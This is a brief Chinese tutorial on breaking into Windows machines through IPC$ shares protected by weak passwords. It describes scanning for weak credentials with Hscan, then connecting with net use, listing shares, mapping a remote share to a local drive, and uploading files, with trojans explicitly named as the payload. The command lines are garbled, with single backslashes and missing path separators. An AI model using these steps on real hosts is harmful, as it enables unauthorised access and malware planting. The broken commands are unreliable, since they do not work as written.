一、什么是IPC$
IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,
通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,
从而实现对远程计算机的访问。
二、如何发现系统是否存在该漏洞
本例中所讲的IPC$漏洞缘起弱口令漏洞,使用一些弱口令扫描工具即可发现IPC$连接是否存在弱口令,例如使用Hscan工具发现弱口令问题
三、如何利用IPC$漏洞入侵
1.建立连接
net use \192.168.*.*ipc$ "密码" /user:"用户名"
2.删除链接
net use \192.168.*.*ipc$ /del
3.查看目标主机是否存在共享资源
net view \192.168.*.*
4.映射远程共享资源到本地,本例中意为将远程主机192.168.*.*的共享资源share映射到本地的z盘
net use z: \192.168.*.*share
查看系统盘符z是否已建立
5.上传文件至该共享资源中(实际的渗透测试中可上传木马等恶意文件)
查看是否已经复制成功
详细命令以及说明请戳这里